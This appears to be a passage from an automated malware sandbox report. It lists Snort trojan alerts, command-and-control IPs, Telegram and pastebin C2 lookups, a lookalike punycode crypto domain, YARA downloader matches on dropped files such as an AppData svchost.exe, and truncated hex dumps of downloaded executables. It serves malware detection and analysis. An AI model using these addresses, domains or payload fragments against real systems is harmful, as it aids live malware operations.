Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49814 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49815 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49816 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49817 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49818 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49820 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49821 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49823 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49825 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49828 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49829 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49833 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49835 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49836 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49839 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49840 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49842 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49843 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49845 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49846 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49847 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49848 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49849 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49850 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49851 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49854 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49855 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49856 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49860 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49864 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49867 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49870 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49871 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49873 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49875 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49877 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49878 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49881 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49884 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49886 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49893 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49896 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49900 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49901 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49904 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49906 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49907 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49908 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49909 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49911 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49912 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49913 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49915 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49916 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49917 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49918 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49919 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49921 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49922 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49923 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49925 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49927 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49929 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49932 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49936 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49939 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49940 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49941 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49943 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49944 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49945 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49947 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49949 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49950 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49951 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49953 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49954 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49955 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49956 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49957 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49959 -> 188.114.96.3:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 64.31.40.18 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 75.119.203.100 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.3.140.185 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 188.114.96.3 80	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 94.232.249.204 7707

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: {"result":200

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Performs DNS queries to domains with low reputation

Source:	DNS query: auth.xn--conbase-sfb.xyz
Source:	DNS query: auth.xn--conbase-sfb.xyz
Source:	DNS query: auth.xn--conbase-sfb.xyz

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.5087.tmp.update.exe.2aa51fc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.4:49777 -> 94.232.249.204:6660

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 06 Jul 2024 11:27:08 GMTContent-Length: 270848Connection: keep-aliveLast-Modified: Mon, 01 Jul 2024 05:33:50 GMTETag: "42200-61c28f1291b41"Accept-Ranges: bytesCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dio18RgX4e%2BgBH3CnXvOdCtF%2FCUvrDnB8exXY23l2626dehfOl0jLUqs7ufIWfVbjs%2FeBCGOzlCs7KznmYyLADhEnae1k74oZpeph5LVKczU6Xj9SInbwG0o%2BoJGYqvu9Cql3jWhikhSvRs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89ef3e6b8c4b8c1d-EWRalt-svc: h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fd cb 1a 09 b9 aa 74 5a b9 aa 74 5a b9 aa 74 5a b9 aa 75 5a c1 aa 74 5a 45 dd cd 5a be aa 74 5a 7d 6f b9 5a b0 aa 74 5a 7d 6f bb 5a 84 aa 74 5a 7d 6f ba 5a 14 aa 74 5a 9e 6c ba 5a bc aa 74 5a 9e 6c bb 5a ad aa 74 5a 9e 6c be 5a b8 aa 74 5a 9e 6c bd 5a b8 aa 74 5a 9e 6c b8 5a b8 aa 74 5a 52 69 63 68 b9 aa 74 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 be 3f 82 66 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0b 00 00 d6 02 00 00 ec 01 00 00 00 00 00 70 d5 01 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 05 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 f0 b5 03 00 53 00 00 00 24 ab 03 00 28 00 00 00 00 d0 04 00 88 02 00 00 00 90 04 00 cc 30 00 00 00 00 00 00 00 00 00 00 00 e0 04 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 6d 03 00 70 00 00 00 00 00 00 00 00 00 00 00 00 f0 02 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3c d4 02 00 00 10 00 00 00 d6 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 43 c6 00 00 00 f0 02 00 00 c8 00 00 00 da 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$tZtZtZuZtZEZtZ}oZtZ}oZtZ}oZtZlZtZlZtZlZtZlZtZlZtZRichtZPEd?f" p`S$(0mp@.text< `.rdataC
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 06 Jul 2024 11:27:09 GMTContent-Length: 88576Connection: keep-aliveLast-Modified: Thu, 06 Jun 2024 17:04:07 GMTETag: "15a00-61a3babc14dc4"Accept-Ranges: bytesCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Eqzmg44SpIW4n2Y4rdSXtOtIu7qV30K6WeUhteYKbZdvBLqQaBgpylrUWF24tIb%2BiSpcgqa54ZM82p29ABOe63BOsAntSee5ifySzbUpP0GPHwjLKVRWWndqqsH7q87Pm2EiGJiL3Wj6q%2BI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89ef3e72a9148c1d-EWRalt-svc: h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 46 0f 2c 83 02 6e 42 d0 02 6e 42 d0 02 6e 42 d0 02 6e 43 d0 96 6e 42 d0 fe 19 fb d0 11 6e 42 d0 fe 19 fe d0 03 6e 42 d0 c6 ab 8d d0 26 6e 42 d0 c6 ab 8c d0 54 6e 42 d0 c6 ab 8f d0 0b 6e 42 d0 25 a8 91 d0 05 6e 42 d0 25 a8 88 d0 03 6e 42 d0 25 a8 8e d0 03 6e 42 d0 52 69 63 68 02 6e 42 d0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 05 00 07 ec 61 66 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0b 00 00 be 00 00 00 bc 00 00 00 00 00 00 b0 34 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 01 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 32 01 00 57 00 00 00 fc 26 01 00 78 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 f4 0b 00 00 00 00 00 00 00 00 00 00 00 90 01 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 13 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 48 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6f bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 77 62 00 00 00 d0 00 00 00 64 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 70 3c 00 00 00 40 01 00 00 1a 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$F,nBnBnBnCnBnBnB&nBTnBnB%nB%nB%nBRichnBPEdaf" 4` 2W&xL`pH.texto `.rdatawb
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 06 Jul 2024 11:27:15 GMTcontent-type: application/x-msdownloadcontent-length: 631296server: nginxlast-modified: Tue, 02 Jul 2024 08:39:04 GMTaccept-ranges: bytesconnection: closeData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b8 dd ab b3 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 98 09 00 00 08 00 00 00 00 00 00 2e b7 09 00 00 20 00 00 00 c0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 b6 09 00 57 00 00 00 00 c0 09 00 c6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 97 09 00 00 20 00 00 00 98 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c6 04 00 00 00 c0 09 00 00 06 00 00 00 9a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 09 00 00 02 00 00 00 a0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 b7 09 00 00 00 00 00 48 00 00 00 02 00 05 00 ec 67 07 00 e8 4e 02 00 01 00 00 00 1a 00 00 06 28 4c 00 00 c1 1b 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 28 70 00 00 06 2a 1e 02 28 10 00 00 0a 2a 1a 73 20 00 00 0a 7a 06 2a 7a 03 2c 13 02 7b 24 00 00 04 2c 0b 02 7b 24 00 00 04 6f 0d 00 00 0a 02 03 28 2a 00 00 0a 2a 2e 73 0e 00 00 06 80 25 00 00 04 2a 2e 73 15 00 00 06 80 2a 00 00 04 2a 1a 28 11 00 00 06 2a 1a 28 45 00 00 06 2a 5a 17 7e 08 00 00 04 7e 28 00 00 04 6f 2b 00 00 0a 28 40 00 00 06 2a 6a 7e 27 00 00 04 6f 2b 00 00 0a 28 27 00 00 06 28 50 00 00 0a 28 5c 00 00 06 2a 2e 73 1d 00 00 06 80 2f 00 00 04 2a 1a 28 53 00 00 06 2a 1a 28 2d 00 00 06 2a 7e 72 d2 12 00 70 28 02 00 00 06 80 33 00 00 04 72 d2 12 00 70 28 02 00 00 06 80 34 00 00 04 2a 72 73 4a 00 00 0a 80 35 00 00 04 7e 35 00 00 04 18 1d 6f 4b 00 00 0a 80 36 00 00 04 2a 62 7e 38 00 00 04 2c 10 7e 38 00 00 04 6f 91 00 00 0a 14 80 38 00 00 04 2a 2e 28 96 00 00 0a 2d 02 16 2a 17 2a 16 05 16 fe 01 2a de 17 73 b8 00 00 0a 16 6f b9 00 00 0a 28 ba 00 00 0a 14 fe 06 50 00 00 06 73 bb 00 00 0a 28 bc 00 00 0a 74 6b 00 00 01 28 bd 00 00 0a 20 f0 0f 00 00 28 be 00 00 0a 2a 7e 72 d
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 06 Jul 2024 11:27:17 GMTcontent-type: application/x-msdownloadcontent-length: 179200server: nginxlast-modified: Tue, 02 Jul 2024 10:09:37 GMTaccept-ranges: bytesconnection: closeData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e3 77 83 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b2 02 00 00 08 00 00 00 00 00 00 be d1 02 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c d1 02 00 4f 00 00 00 00 e0 02 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 b1 02 00 00 20 00 00 00 b2 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 e0 02 00 00 06 00 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 03 00 00 02 00 00 00 ba 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 d1 02 00 00 00 00 00 48 00 00 00 02 00 05 00 d8 43 01 00 94 8d 01 00 03 00 02 00 fb 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 14 2a 00 06 2a 00 00 0a 14 2a 00 06 2a 00 00 1a 72 01 00 00 70 2a 00 06 2a 00 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 06 2a 00 00 06 2a 00 00 36 02 72 01 00 00 70 03 6f 11 00 00 06 2a 00 00 0a 14 2a 00 0a 14 2a 00 0a 03 2a 00 0a 14 2a 00 22 1f fe 73 5e 00 00 06 2a 00 00 00 3e 1f fe 73 66 00 00 06 25 02 7d 22 00 00 04 2a 0a 16 2a 00 0a 04 2a 00 13 30 05 00 17 00 00 00 01 00 00 11 73 03 00 00 0a 0a 02 06 16 16 16 6f 1d 00 00 06 06 6f 04 00 00 0a 2a 00 13 30 05 00 17 00 00 00 01 00 00 11 73 03 00 00 0a 0a 02 06 16 03 17 6f 1d 00 00 06 06 6f 04 00 00 0a 2a 00 1e 02 73 56 00 00 06 2a 32 02 6f 1e 00 00 06 73 52 00 00 06 2a 00 00 00 32 02 6f 1e 00 00 06 73 4c 00 00 06 2a 00 00 00 13 30 04 00 2f 00 00 00 02 00 00 11 23 00 00 00 00 00 00 00 00 0a 02 6f 06 00 00 06 20 a7 00 00 00 28 05 00 00 0a 12 00 28 06 00 00 0a 2c 02 06 2a 23 00 00 00 00 00 00 00 00 2a 00 4e 02 0f 01 28 05 00 00 